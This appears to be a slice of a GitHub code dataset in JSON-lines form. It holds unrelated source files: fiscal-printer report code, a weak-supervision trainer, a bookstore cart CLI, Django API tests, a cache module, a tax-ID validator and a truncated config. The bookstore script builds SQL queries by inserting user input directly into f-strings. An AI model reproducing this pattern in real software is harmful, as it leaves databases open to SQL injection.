\"200000007000000100Tax Rate 2/ Producto Tasa Reducida\"))\n\t\tself.printer.SendCmd(str(\"`3\" + \"300000009000000100Tax Rate 3/ Producto Tasa Adicional\"))\n\t\tself.printer.SendCmd(str(\"3\"))\n\t\tself.printer.SendCmd(str(\"101\"))\n\n\tdef ReimprimirFacturas(self, value):\n\t\tvalue = value[1:]\n\t\tn_ini = value\n\t\tn_fin = value\n\n\t\tstarString = str(n_ini)\n\t\twhile (len(starString) < 7):\n\t\t\tstarString = \"0\" + starString\n\t\tendString = str(n_fin)\n\t\twhile (len(endString) < 7):\n\t\t\tendString = \"0\" + endString\n\t\tself.printer.SendCmd(\"RF\" + starString + endString)\n\n\tdef ObtZpornumero(self):\n\t\tn_ini = self.obt_num_ini.value()\n\t\tn_fin = self.obt_num_fin.value()\n\t\treportes = self.printer.GetZReport(\"A\",n_ini,n_fin)\n\t\tCR = len(reportes)\n\t\tEnc = \"Lista de Reportes\\n\"+\"\\n\"\n\t\tsalida = \"\"\n\t\tfor NR in range(CR):\n\t\t\tsalida+= \"Numero de Reporte Z: \"+ str(reportes[NR]._numberOfLastZReport)\n\t\t\tsalida+= \"\\nFecha Ultimo Reporte Z: \"+ str(reportes[NR]._zReportDate)\n\t\t\tsalida+= \"\\nHora Ultimo Reporte Z: \"+ str(reportes[NR]._zReportTime)\n\t\t\tsalida+= \"\\nNumero Ultima Factura: \"+ str(reportes[NR]._numberOfLastInvoice)\n\t\t\tsalida+= \"\\nFecha Ultima Factura: \"+ str(reportes[NR]._lastInvoiceDate)\n\t\t\tsalida+= \"\\nHora Ultima Factura: \"+ str(reportes[NR]._lastInvoiceTime)\n\t\t\tsalida+= \"\\nNumero Ultima Nota de Credito: \"+ str(reportes[NR]._numberOfLastCreditNote)\n\t\t\tsalida+= \"\\nNumero Ultima Nota de Debito: \"+ str(reportes[NR]._numberOfLastDebitNote)\n\t\t\tsalida+= \"\\nNumero Ultimo Doc No Fiscal: \"+ str(reportes[NR]._numberOfLastNonFiscal)\n\t\t\tsalida+= \"\\nVentas Exento: \"+ str(reportes[NR]._freeSalesTax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA G: \"+ str(reportes[NR]._generalRate1Sale)\n\t\t\tsalida+= \"\\nImpuesto IVA G: \"+ str(reportes[NR]._generalRate1Tax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA R: \"+ str(reportes[NR]._reducedRate2Sale)\n\t\t\tsalida+= \"\\nImpuesto IVA R: \"+ str(reportes[NR]._reducedRate2Tax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA A: \"+ str(reportes[NR]._additionalRate3Sal)\n\t\t\tsalida+= \"\\nImpuesto IVA A: \"+ str(reportes[NR]._additionalRate3Tax)\n\t\t\tsalida+= \"\\nNota de Debito Exento: \"+ str(reportes[NR]._freeTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA G en Nota de Debito: \"+ str(reportes[NR]._generalRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA G en Nota de Debito: \"+ str(reportes[NR]._generalRateTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA R en Nota de Debito: \"+ str(reportes[NR]._reducedRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA R en Nota de Debito: \"+ str(reportes[NR]._reducedRateTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA A en Nota de Debito: \"+ str(reportes[NR]._additionalRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA A en Nota de Debito: \"+ str(reportes[NR]._additionalRateTaxDebit)\n\t\t\tsalida+= \"\\nNota de Credito Exento: \"+ str(reportes[NR]._freeTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA G en Nota de Credito: \"+ str(reportes[NR]._generalRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA G en Nota de Credito: \"+ str(reportes[NR]._generalRateTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA R en Nota de Credito: \"+ str(reportes[NR]._reducedRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA R en Nota de Credito: \"+ str(reportes[NR]._reducedRateTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA A en Nota de Credito: \"+ str(reportes[NR]._additionalRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA A en Nota de Credito: \"+ str(reportes[NR]._additionalRateTaxDevolution)+\"\\n\"+\"\\n\"\n\t\t\tprint(salida)\t\t\t\n\t\tself.txt_informacion.setText(Enc+salida)\n\n\tdef ObtZporfecha(self):\n\t\tn_ini = self.obt_date_ini.date().toPyDate()\n\t\tn_fin = self.obt_date_fin.date().toPyDate()\n\t\treportes = self.printer.GetZReport(\"A\",n_ini,n_fin)\n\t\tCR = len(reportes)\n\t\tEnc = \"Lista de Reportes\\n\"+\"\\n\"\n\t\tsalida = \"\"\n\t\tfor NR in range(CR):\n\t\t\tsalida+= \"Numero de Reporte Z: \"+ str(reportes[NR]._numberOfLastZReport) \n\t\t\tsalida+= \"\\nFecha Ultimo Reporte Z: \"+ str(reportes[NR]._zReportDate) \n\t\t\tsalida+= \"\\nHora Ultimo Reporte Z: \"+ str(reportes[NR]._zReportTime) \n\t\t\tsalida+= \"\\nNumero Ultima Factura: \"+ str(reportes[NR]._numberOfLastInvoice) \n\t\t\tsalida+= \"\\nFecha Ultima Factura: \"+ str(reportes[NR]._lastInvoiceDate) \n\t\t\tsalida+= \"\\nHora Ultima Factura: \"+ str(reportes[NR]._lastInvoiceTime)\n\t\t\tsalida+= \"\\nNumero Ultima Nota de Credito: \"+ str(reportes[NR]._numberOfLastCreditNote)\n\t\t\tsalida+= \"\\nNumero Ultima Nota de Debito: \"+ str(reportes[NR]._numberOfLastDebitNote)\t\t\t\n\t\t\tsalida+= \"\\nNumero Ultimo Doc No Fiscal: \"+ str(reportes[NR]._numberOfLastNonFiscal)\n\t\t\tsalida+= \"\\nVentas Exento: \"+ str(reportes[NR]._freeSalesTax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA G: \"+ str(reportes[NR]._generalRate1Sale)\n\t\t\tsalida+= \"\\nImpuesto IVA G: \"+ str(reportes[NR]._generalRate1Tax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA R: \"+ str(reportes[NR]._reducedRate2Sale)\n\t\t\tsalida+= \"\\nImpuesto IVA R: \"+ str(reportes[NR]._reducedRate2Tax)\n\t\t\tsalida+= \"\\nBase Imponible Ventas IVA A: \"+ str(reportes[NR]._additionalRate3Sal)\n\t\t\tsalida+= \"\\nImpuesto IVA A: \"+ str(reportes[NR]._additionalRate3Tax)\n\t\t\tsalida+= \"\\nNota de Debito Exento: \"+ str(reportes[NR]._freeTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA G en Nota de Debito: \"+ str(reportes[NR]._generalRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA G en Nota de Debito: \"+ str(reportes[NR]._generalRateTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA R en Nota de Debito: \"+ str(reportes[NR]._reducedRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA R en Nota de Debito: \"+ str(reportes[NR]._reducedRateTaxDebit)\n\t\t\tsalida+= \"\\nBI IVA A en Nota de Debito: \"+ str(reportes[NR]._additionalRateDebit)\n\t\t\tsalida+= \"\\nImpuesto IVA A en Nota de Debito: \"+ str(reportes[NR]._additionalRateTaxDebit)\n\t\t\tsalida+= \"\\nNota de Credito Exento: \"+ str(reportes[NR]._freeTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA G en Nota de Credito: \"+ str(reportes[NR]._generalRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA G en Nota de Credito: \"+ str(reportes[NR]._generalRateTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA R en Nota de Credito: \"+ str(reportes[NR]._reducedRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA R en Nota de Credito: \"+ str(reportes[NR]._reducedRateTaxDevolution)\n\t\t\tsalida+= \"\\nBI IVA A en Nota de Credito: \"+ str(reportes[NR]._additionalRateDevolution)\n\t\t\tsalida+= \"\\nImpuesto IVA A en Nota de Credito: \"+ str(reportes[NR]._additionalRateTaxDevolution)+\"\\n\"+\"\\n\"\n\t\t\tprint(salida)\n\t\tself.txt_informacion.setText(Enc+salida)","repo_name":"luisnvf7/printer","sub_path":"impresora.py","file_name":"impresora.py","file_ext":"py","file_size_in_byte":19418,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75328590888","text":"import copy\nimport logging\nimport os\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom joblib import dump\n\nfrom knodle.trainer.baseline.majority import MajorityVoteTrainer\nfrom knodle.trainer.utils import log_section\nfrom knodle.trainer.wscrossweigh.data_splitting_by_rules import k_folds_splitting_by_rules\nfrom knodle.transformation.filter import filter_empty_probabilities\nfrom knodle.transformation.majority import z_t_matrices_to_majority_vote_probs\n\nlogger = logging.getLogger(__name__)\ntorch.set_printoptions(edgeitems=100)\n\n\nclass WSCrossWeighWeightsCalculator(MajorityVoteTrainer):\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n # save the copy of the original model; later wscrossweigh models for each training with a new hold-out fold\n # will be copied from it\n self.wscrossweigh_model = copy.deepcopy(self.model).to(self.trainer_config.device)\n self.sample_weights = torch.empty(0)\n\n def calculate_weights(self) -> torch.FloatTensor:\n \"\"\"\n This function calculates the sample_weights for samples using WSCrossWeigh method\n :return matrix of the sample sample_weights\n \"\"\"\n\n # initialize optimizer\n self.trainer_config.optimizer = self.initialise_optimizer()\n\n if self.trainer_config.folds < 2:\n raise ValueError(\"Number of folds should be at least 2 to perform WSCrossWeigh denoising\")\n\n logger.info(\"======= Denoising with WSCrossWeigh is started =======\")\n os.makedirs(self.trainer_config.caching_folder, exist_ok=True)\n\n noisy_y_train = z_t_matrices_to_majority_vote_probs(\n self.rule_matches_z, self.mapping_rules_labels_t, self.trainer_config.other_class_id\n )\n\n if self.trainer_config.filter_non_labelled:\n self.model_input_x, noisy_y_train, self.rule_matches_z = filter_empty_probabilities(\n self.model_input_x, noisy_y_train, self.rule_matches_z\n )\n\n # initialise sample weights\n self.sample_weights = self.initialise_sample_weights()\n\n train_datasets, test_datasets = \\\n k_folds_splitting_by_rules(\n self.model_input_x,\n noisy_y_train,\n self.rule_matches_z,\n self.trainer_config.partitions,\n self.trainer_config.folds,\n self.trainer_config.other_class_id\n )\n\n for iter, (train_dataset, test_dataset) in enumerate(zip(train_datasets, test_datasets)):\n log_section(\n f\"WSCrossWeigh Iteration {iter + 1}/{self.trainer_config.partitions * self.trainer_config.folds}:\",\n logger\n )\n\n # for each fold the model is trained from scratch\n self.model = copy.deepcopy(self.wscrossweigh_model).to(self.trainer_config.device)\n test_loader = self._make_dataloader(test_dataset)\n train_loader = self._make_dataloader(train_dataset)\n self._train_loop(train_loader)\n self.cw_test(test_loader)\n\n log_section(f\"WSCrossWeigh Partition {iter + 1} is done\", logger)\n\n dump(self.sample_weights, os.path.join(\n self.trainer_config.caching_folder, f\"sample_weights_{self.trainer_config.caching_suffix}.lib\"))\n\n logger.info(\"======= Denoising with WSCrossWeigh is completed =======\")\n return self.sample_weights\n\n def cw_test(self, test_loader: DataLoader) -> None:\n \"\"\"\n This function tests of trained WSCrossWeigh model on a hold-out fold, compared the predicted labels with the\n ones got with weak supervision and reduces sample_weights of disagreed samples\n :param test_loader: loader with the data which is used for testing (hold-out fold)\n \"\"\"\n self.wscrossweigh_model.eval()\n correct_predictions, wrong_predictions = 0, 0\n\n with torch.no_grad():\n for batch in test_loader:\n features, labels = self._load_batch(batch)\n data_features, data_indices = features[:-1], features[-1]\n\n outputs = self.wscrossweigh_model(*data_features)\n outputs = outputs[0] if not isinstance(outputs, torch.Tensor) else outputs\n _, predicted = torch.max(outputs.data, -1)\n predictions = predicted.tolist()\n\n for curr_pred in range(len(predictions)):\n gold = labels.tolist()[curr_pred]\n gold_classes = gold.index(max(gold))\n guess = predictions[curr_pred]\n if guess != gold_classes: # todo: what if more than one class could be predicted? e.g. conll\n wrong_predictions += 1\n curr_id = data_indices[curr_pred].tolist()\n self.sample_weights[curr_id] *= self.trainer_config.weight_reducing_rate\n else:\n correct_predictions += 1\n logger.info(\"Correct predictions: {:.3f}%, wrong predictions: {:.3f}%\".format(\n correct_predictions * 100 / (correct_predictions + wrong_predictions),\n wrong_predictions * 100 / (correct_predictions + wrong_predictions)))\n\n def initialise_sample_weights(self) -> torch.FloatTensor:\n \"\"\" Initialise a sample_weights matrix (num_samples x 1): weights for all samples equal sample_start_weights \"\"\"\n return torch.FloatTensor([self.trainer_config.samples_start_weights] * self.model_input_x.tensors[0].shape[0])\n","repo_name":"knodle/knodle","sub_path":"knodle/trainer/wscrossweigh/wscrossweigh_weights_calculator.py","file_name":"wscrossweigh_weights_calculator.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"53"} +{"seq_id":"2861397428","text":"import sqlite3\nimport time\n\nconn = sqlite3.connect('buku.db')\nconn2 = sqlite3.connect(':memory:')\n\ncursor = conn.cursor()\ncursor2 = conn2.cursor()\n\ncursor2.execute(\"\"\"CREATE TABLE IF NOT EXISTS keranjang (\n id_keranjang INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,\n judul_buku TEXT NOT NULL,\n jumlah_pembelian INTEGER NOT NULL,\n harga_buku INTEGER NOT NULL,\n tanggal_beli TIMESTAMP DEFAULT CURRENT_TIMESTAMP NOT NULL\n )\"\"\")\n\ndef showAllData():\n #Show all data info\n cursor.execute(\"SELECT * FROM buku\")\n result = cursor.fetchall()\n for i in result:\n print(i)\n\n conn.commit()\n\n print(\"\\n\")\n\ndef searchBook():\n #search book by name\n name = input(\"Nama buku: \")\n query = f'SELECT * FROM buku WHERE judul_buku=\"{name}\"'\n cursor.execute(query)\n result = cursor.fetchone()\n\n if (result == None):\n print(\"Hasil pencarian tidak ada\")\n else:\n print(result)\n\n print(\"\\n\")\n\ndef addCart():\n #add books to the cart\n hasil = 0\n total = 0\n tambah = int(input(\"Masukkan id buku: \"))\n jumlah = int(input(\"Masukkan jumlah pembelian: \"))\n ambil = f'SELECT judul_buku FROM buku WHERE id_buku={tambah}'\n cursor.execute(ambil)\n result = cursor.fetchone()\n for row in result:\n hasil = row\n\n ambil_harga = f'SELECT harga_buku FROM buku WHERE id_buku={tambah}'\n cursor.execute(ambil_harga)\n harga = cursor.fetchone()\n for row in harga:\n total = row\n\n query = f'INSERT INTO keranjang(judul_buku, jumlah_pembelian, harga_buku) VALUES (\"{hasil}\", {jumlah}, {total * jumlah})'\n cursor2.execute(query)\n\n conn2.commit()\n\n print(\"\\n\")\n\ndef showCart():\n # Show all books in cart\n cursor2.execute(\"SELECT * FROM keranjang\")\n result = cursor2.fetchall()\n for i in result:\n print(i)\n\n conn2.commit()\n\n print(\"\\n\")\n\ndef deleteCart():\n # delete books in cart\n keranjangId = int(input('Id keranjang: '))\n query = f'DELETE FROM keranjang WHERE id_keranjang={keranjangId}'\n cursor2.execute(query)\n\n conn2.commit()\n\n print(\"\\n\")\n\ndef buy():\n #execution\n cursor2.execute(\"SELECT judul_buku, jumlah_pembelian, harga_buku FROM keranjang\")\n Data = cursor2.fetchall()\n formatted_row = '{:<20} {:<15} {:12}'\n t = time.localtime()\n\n print(\"-------------------------------------------------\")\n print(\"\\t\\t\\tTOKO BERNICHA SEJAHTERA\\n\")\n print(\"Kasir : Bernicha elek\")\n print(\"Waktu : %s \" % time.asctime(t))\n print(\"-------------------------------------------------\")\n print(formatted_row.format(\"Judul\", \"Jumlah Pembelian\", \"\\t\\tHarga\"))\n print(\"-------------------------------------------------\")\n for Row in Data:\n print(formatted_row.format(*Row))\n\n conn2.commit()\n\n harga = f'SELECT SUM(harga_buku) FROM keranjang'\n cursor2.execute(harga)\n total = cursor2.fetchone()\n\n print(\"-------------------------------------------------\")\n print(\"\\nTotal harga: \")\n for row in total:\n print(row)\n\n print(\"\\n\")\n\n print(\"-------------------------------------------------\")\n print(\"\\t\\t\\tTerima kasih telah berbelanja\")\n print(\"-------------------------------------------------\")\n\n cursor2.execute(\"DELETE FROM keranjang\")\n\nwhile True:\n print(\"Pilihan Menu Pengguna\")\n print(\"\"\"\n 1. Show All Book\n 2. Search Book\n 3. Add Cart\n 4. Show Cart\n 5. Delete Cart\n 6. Buy\n 7. Exit\n\n \"\"\")\n pilihan = int(input('Pilihan: '))\n\n if (pilihan == 1):\n showAllData()\n elif (pilihan == 2):\n searchBook()\n elif (pilihan == 3):\n addCart()\n elif (pilihan == 4):\n showCart()\n elif (pilihan == 5):\n deleteCart()\n elif (pilihan == 6):\n buy()\n elif (pilihan == 7):\n break\n else:\n print('Menu tidak valid!')","repo_name":"bernichadiahayu/projekPBO","sub_path":"customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73079633129","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\nfrom django.contrib.auth.models import User\nfrom .models import Post\n\n\n\nclass NewsApiTest(TestCase):\n\n def setUp(self):\n user = User.objects.create(username='tornado')\n self.client = APIClient()\n self.client.force_authenticate(user=user)\n self.post_data = {\n 'title':'Docker', 'content':'Docker is very powerful', 'author':user.id\n }\n self.response = self.client.post(\n reverse('news'),\n self.post_data,\n format='json'\n )\n\n def test_api_can_get_posts(self):\n response = self.client.get(\n reverse('news')\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK )\n\n\n def test_api_can_create_a_post(self):\n self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)\n\n\n def test_api_can_get_a_post(self):\n post = Post.objects.get()\n response = self.client.get(\n reverse('news-detail',\n kwargs={'pk': post.id}), format=\"json\")\n\n def test_api_can_update_a_post(self):\n post = Post.objects.get()\n change_post = {'title':'RestApi', 'content':'RestApiIsGood'}\n response = self.client.put(\n reverse('news-detail', kwargs={'pk':post.id}),\n change_post, format='json'\n )\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\n def test_api_can_delete_a_post(self):\n post = Post.objects.get()\n response = self.client.delete(\n reverse('news-detail', kwargs={'pk':post.id}),\n format='json', follow=True\n )\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n\n\n","repo_name":"chitcomhub/website","sub_path":"news/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"17220649709","text":"import os\nimport shutil\nimport pathlib\nimport atexit\nimport weakref\nfrom . import random\nfrom . import hash\nfrom .. import immutable\n\n\n\n\nclass _Cache:\n \"\"\"\n Cache class.\n \"\"\"\n def __init__ (self, cachePrefix: str, tempPrefix: str, noPersistence: bool):\n # base path of cache directory\n if (cachePrefix == None) or (cachePrefix == \"\"):\n cachePrefix = \".pcsg.cache\"\n\n #: random sequence, seeded with time stamp\n self.rand = random.RandomSequence ()\n\n #: cachePrefix supplied to constructor\n self.cachePrefix = cachePrefix\n\n #: absolute cache directory \n self.cacheDir = pathlib.Path.absolute (pathlib.Path (cachePrefix + pathlib.os.sep + \"cache\"))\n if not self.cacheDir.exists ():\n try:\n self.cacheDir.mkdir (parents = True, exist_ok = True)\n except:\n pass\n\n #: tempPrefix supplied to constructor\n self.tempPrefix = tempPrefix\n\n #: location for temporary files\n if (tempPrefix == None) or (tempPrefix == \"\"):\n tempPrefix = cachePrefix + pathlib.os.sep + \"temp\" + pathlib.os.sep + self._createTempName ()\n\n #: flag to disable persistence\n self.noPersistence = noPersistence\n\n #: absolute temp directory, create if not existing\n self.tempDir = pathlib.Path.absolute (pathlib.Path (tempPrefix))\n tempCreated = False\n if not self.tempDir.exists ():\n tempCreated = True\n try:\n self.tempDir.mkdir (parents = True, exist_ok = True)\n except:\n tempCreated = False\n self._tempCreated = tempCreated\n\n # remove temp folder on application terminate\n atexit.register (self._onTerminate)\n\n #: weak cached items\n self._weakCache = weakref.WeakValueDictionary ()\n\n\n #: Alphabet to choose characters from when creating random temporary file names.\n _tempChars = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"\n\n\n def _createTempName (self, length = 12):\n \"\"\"\n Generates a temporary name.\n \"\"\"\n result = \"\"\n cid = 0\n while cid < length:\n rid = self.rand.intRange (len (_Cache._tempChars) - 1)\n rc = _Cache._tempChars[rid]\n result += rc\n cid += 1\n return result\n\n\n def _onTerminate (self):\n \"\"\"\n Clean up temorary files on termination.\n \"\"\"\n if self._tempCreated:\n try:\n shutil.rmtree (self.tempDir)\n except:\n pass\n\n\n def load (self, fingerprint, suffix):\n \"\"\"\n Load instance from cache by fingerprint.\n \"\"\"\n hashKey = '{:016x}'.format (hash (\"path\", fingerprint)) + \"-\" + str (suffix)\n cacheEntry = self._weakCache.get (hashKey)\n if cacheEntry != None:\n return cacheEntry\n if self.noPersistence:\n return None\n path = pathlib.Path (self.persistentPath (fingerprint, suffix))\n if path.exists:\n try:\n with path.open (\"rb\") as file:\n obj = immutable.DataObject.restore (file, True)\n self._weakCache[hashKey] = obj\n return obj\n except:\n return None\n return None\n\n\n def store (self, instance, fingerprint, suffix):\n \"\"\"\n Store instance by fingerprint to cache.\n \"\"\"\n hashKey = '{:016x}'.format (hash (\"path\", fingerprint)) + \"-\" + str (suffix)\n self._weakCache[hashKey] = instance\n if self.noPersistence != True:\n pp = self.persistentPath (fingerprint, suffix, create = True)\n ppPre = pp + \".temp.\" + self._createTempName ()\n with open (ppPre, \"wb\") as file:\n instance.store (file)\n try:\n os.rename (ppPre, pp)\n except:\n pass\n return instance\n\n\n def persistentPath (self, fingerprint, suffix, create = False):\n \"\"\"\n Create a persistent path for an item with a fingerprint\n \"\"\"\n hashStr = '{:016x}'.format (hash (\"path\", fingerprint))\n hcPath = str (self.cacheDir) + pathlib.os.sep + hashStr[0:2] + pathlib.os.sep + hashStr[2:4]\n hcFile = hcPath + pathlib.os.sep + hashStr[4:len (hashStr)] + \".\" + suffix\n if create:\n if not pathlib.Path (hcPath).exists ():\n try:\n pathlib.Path (hcPath).mkdir (parents = True, exist_ok = True)\n except:\n pass\n return hcFile\n\n\n def temppath (self, suffix: str, create: bool = False):\n \"\"\"\n Create temporary path name.\n \"\"\"\n pathName = self.tempDir\n fileName = str (pathName) + pathlib.os.sep + self._createTempName ()\n if suffix != None:\n if suffix != \"\":\n fileName += \".\" + suffix\n if create:\n if not pathlib.Path (pathName).exists ():\n pathlib.Path (pathName).mkdir (parents = True, exist_ok = True)\n return fileName\n\n\"\"\"\nSingle instance of cache.\n\"\"\"\n_CacheInstance = None\n\n\n\n\ndef setup (cachePrefix: str = None, tempPrefix: str = None, noPersistence: bool = False, ignoreIfAlreadySetup: bool = False):\n \"\"\"\n Setup the cache module. The cache will operate on the directories specified by *cachePrefix* and *tempPrefix*.\n Setup must only be called once, when calling a second time with other parameters, an exception will be thrown.\n \"\"\"\n global _CacheInstance\n if _CacheInstance != None:\n if not ignoreIfAlreadySetup:\n assert _CacheInstance.cachePrefix == cachePrefix, \"Cache was already initialized with different arguments.\"\n assert _CacheInstance.tempPrefix == tempPrefix, \"Cache was already initialized with different arguments.\"\n assert _CacheInstance.noPersistence == noPersistence, \"Cache was already initialized with different arguments.\"\n else:\n _CacheInstance = _Cache (cachePrefix = cachePrefix, tempPrefix = tempPrefix, noPersistence = noPersistence)\n return _CacheInstance\n\n\n\n\ndef instance ():\n \"\"\"\n Get single instance of cache. If not setup already, the cache will be set up by default parameters.\n \"\"\"\n global _CacheInstance\n if _CacheInstance != None:\n return _CacheInstance\n else:\n return setup ()\n\n\n\n\ndef temporary (suffix: str = None):\n \"\"\"\n Creates a temporary file name and returns it's absolute path.\n \"\"\"\n cache = instance ()\n return cache.temppath (suffix)\n\n\n\n\ndef load (fingerprint, suffix: str = \"\"):\n \"\"\"\n Load data object by fingerprint.\n \"\"\"\n cache = instance ()\n return cache.load (fingerprint, suffix)\n\n\n\n\ndef store (item, fingerprint, suffix: str = \"\"):\n \"\"\"\n Store data object by fingerprint.\n \"\"\"\n cache = instance ()\n return cache.store (item, fingerprint, suffix)\n\n\n\n\ndef persistentPath (fingerprint, suffix: str = \"\", create: bool = False):\n \"\"\"\n Get persistent absolute path of item by fingerprint.\n \"\"\"\n cache = instance ()\n return cache.persistentPath (fingerprint, suffix, create)\n","repo_name":"WhiteSheet/pcsg","sub_path":"pcsg/util/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73363855849","text":"\nimport numpy as np\nimport scipy.linalg as sci\n\n\n#Notes and questions. We don't caluclate the u values on the borders, when calculating the size\n#of our 2D matrix do we subtract for the i=0,j=0 and i=last, j=last points, which are on \n#the boundaries and not inside the room. \n\n#i think I have switched the indecies compared to the lecture, with i being y value, and j being x value\n\nclass Room():\n def __init__(self, room_size, dx):\n \"\"\"\n room_size : vector x[0] - size of room in x dimension x[1] size of room in y dimension\n dx : step size in the Cartesian Grid\n c1 : arbitrary constant between (0,1)\n c2 : arbitrary constant for the curvature condition between (c1,1)\n \n Implemented as per slide 21 in the course lecture\n \"\"\"\n self.room_size = room_size\n self.dx = dx\n self.x_size = int(room_size[0]/dx)\n self.y_size = int(room_size[1]/dx)\n self.v_size = int(self.x_size*self.y_size) #If I should remove the boundarys could just subtract here\n self.b = np.zeros((self.v_size,1))\n \n self.u_new = None\n self.u_current = None\n \n #Create the a matrix. \n \n a_r = np.zeros(self.v_size)\n a_c = np.zeros(self.v_size)\n a_r[0] = -4\n a_c[0] = -4\n a_r[1]= a_r[self.x_size] =1\n a_c[1] = a_c[self.x_size] = 1\n a = sci.toeplitz(a_c,a_r)\n #removes the a values that should come from boundary walls instead. \n for i in range(self.y_size-1):\n a[(1+i)*(self.x_size)-1][(1+i)*(self.x_size)]=0\n a[(1+i)*(self.x_size)][(1+i)*(self.x_size)-1]=0\n self. a = 1/(dx**2)*a\n# for i in range(self.v_size):\n# self.a[i,i]=-4\n# if()\n# self.a[i,i+x_size] = 1\n# \n \n def update_dirichlt_condition(self,wall,start,new_value):\n s = int(start/self.dx)\n dirichlt_value = np.array([])\n for i in range(len(new_value)):\n if(wall=='right'):\n index = (i+s+1)*self.x_size-1\n self.b[index][0] = self.b[index][0]-self.right[i+s]\n self.right[i+s] = -new_value[i]/(self.dx**2)\n elif(wall=='left'):\n index = (i+s)*self.x_size\n self.b[index][0] = self.b[index][0]-self.left[i+s]\n self.left[i+s] = -new_value[i]/(self.dx**2)\n dirichlt_value = np.append(dirichlt_value,-new_value[i]/(self.dx**2))\n self.add_dirichlt_condition(dirichlt_value, wall, start)\n \n \n #wall can be a string that is top, bottom,left,or right\n def add_dirichlt_condition(self,value,wall,start):\n start = int(start/self.dx)\n for i in range(len(value)):\n if(wall=='bottom'):\n index = start+i\n assert(index 9:\n contr_number %= 10\n if contr_number == int(your_number[9]):\n return True\n else:\n return False\n else:\n if contr_number == int(your_number[9]):\n return True\n else:\n return False\n\n\ndef num_check_12():\n global your_number\n coef = (7, 2, 4, 10, 3, 5, 9, 4, 6, 8)\n summ = 0\n for index, i in enumerate(coef):\n summ += (int(i) * int(your_number[index]))\n contr_num_1 = summ % 11\n if contr_num_1 > 9:\n contr_num_1 %= 10\n coef = (3, 7, 2, 4, 10, 3, 5, 9, 4, 6, 8)\n summ = 0\n for index, i in enumerate(coef):\n summ += (int(i) * int(your_number[index]))\n contr_num_2 = summ % 11\n if contr_num_2 > 9:\n contr_num_2 %= 10\n if (contr_num_1 == int(your_number[10])) and (contr_num_2 == int(your_number[11])):\n return True\n else:\n return False\n\n\ndef inn_check():\n global your_number\n if len(your_number) == 10:\n print(num_check_10())\n elif len(your_number) == 12:\n print(num_check_12())\n else:\n print(False)\n return False\n\n\ninn_check()\n","repo_name":"Grafin-qp/HSE_Ivan_khamidullin","sub_path":"Lesson 4.py","file_name":"Lesson 4.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15591873426","text":"class Underscore(object):\n # map\n # produces a new list of values by mapping each value through\n # a transformation function, lambda\n def map(self, iterable, function):\n for i in range(len(iterable)):\n iterable[i] = function(iterable[i])\n return iterable\n # reduce\n # boils the elements of a list down to a single value\n def reduce(self, iterable, function, memo):\n for num in iterable:\n memo = function(memo,num)\n return memo\n # find\n # determine whether a value exists within a list of values\n def find(self, iterable, function):\n for num in iterable:\n if function(num):\n return num\n return False\n # filter\n # looks through the values in a list returning an array of all the values\n # that meet a specific condition\n def filter(self, iterable, function):\n matches = []\n for num in iterable:\n if function(num):\n matches.append(num)\n return matches\n # reject\n # looks through the values in a list returning an array of all the values\n # that do not meet a specific condition\n def reject(self, iterable, function):\n rejected = []\n for num in iterable:\n if not function(num):\n rejected.append(num)\n return rejected","repo_name":"huyngopt1994/python-Algorithm","sub_path":"test/underscore.py","file_name":"underscore.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"29757225171","text":"INPUT_DIM = 4\nEMBEDDING_DIM = 128\nK_SIZE = 20 # the number of neighbors\n\nUSE_GPU = False # do you want to use GPUS?\nNUM_GPU = 0 # the number of GPUs\nNUM_META_AGENT = 16 # the number of processes\nFOLDER_NAME = 'ae_clean'\nmodel_path = 